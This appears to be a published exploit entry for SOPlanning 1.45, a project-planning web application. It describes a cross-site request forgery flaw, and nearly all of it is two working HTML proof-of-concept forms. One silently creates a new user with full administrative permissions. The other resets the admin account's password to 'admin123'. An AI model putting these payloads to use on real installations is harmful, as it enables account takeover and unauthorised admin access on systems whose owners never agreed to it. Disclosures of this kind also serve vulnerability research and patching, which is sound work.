# Exploit Title: SOPlanning 1.45 - Cross-Site Request Forgery (Add User) # Date: 2020-02-14 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://www.soplanning.org/en/ # Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/ # Version 1.45 # Tested on Windows 10/Kali Rolling # The SoPlanning 1.45 application is vulnerable to CSRF that allows for arbitrary # user creation and for changing passwords (Specifically the admin password) # POC For aribtrary user creation: # CSRF POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.22.6.208/soplanning/www/process/xajax_server.php" method="POST"> <input type="hidden" name="xajax" value="submitFormUser" /> <input type="hidden" name="xajaxr" value="1581700271752" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="1" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="Testing" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="Test" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="test" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="&#35;FFFFFF" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><e><k>0<&#47;k><v>users&#95;manage&#95;all<&#47;v><&#47;e><e><k>1<&#47;k><v>projects&#95;manage&#95;all<&#47;v><&#47;e><e><k>2<&#47;k><v>projectgroups&#95;manage&#95;all<&#47;v><&#47;e><e><k>3<&#47;k><v>tasks&#95;modify&#95;all<&#47;v><&#47;e><e><k>4<&#47;k><v>tasks&#95;view&#95;all&#95;projects<&#47;v><&#47;e><e><k>5<&#47;k><v>tasks&#95;view&#95;all&#95;users<&#47;v><&#47;e><e><k>6<&#47;k><v>lieux&#95;all<&#47;v><&#47;e><e><k>7<&#47;k><v>ressources&#95;all<&#47;v><&#47;e><e><k>8<&#47;k><v>audit&#95;restore<&#47;v><&#47;e><e><k>9<&#47;k><v>parameters&#95;all<&#47;v><&#47;e><e><k>10<&#47;k><v>stats&#95;users<&#47;v><&#47;e><e><k>11<&#47;k><v>stats&#95;projects<&#47;v><&#47;e><&#47;xjxobj>" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="<xjxobj><&#47;xjxobj>" /> <input type="submit" value="Submit request" /> </form> </body> </html> # POC for admin password change: # CSRF POC: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://HOSTNAME/soplanning/www/process/xajax_server.php" method="POST"> <input type="hidden" name="xajax" value="submitFormProfil" /> <input type="hidden" name="xajaxr" value="1581702103306" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="ADM" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="test&#64;test&#46;com" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="admin123" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="fr" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="true" /> <input type="hidden" name="xajaxargs&#91;&#93;" value="false" /> <input type="submit" value="Submit request" /> </form> </body> </html>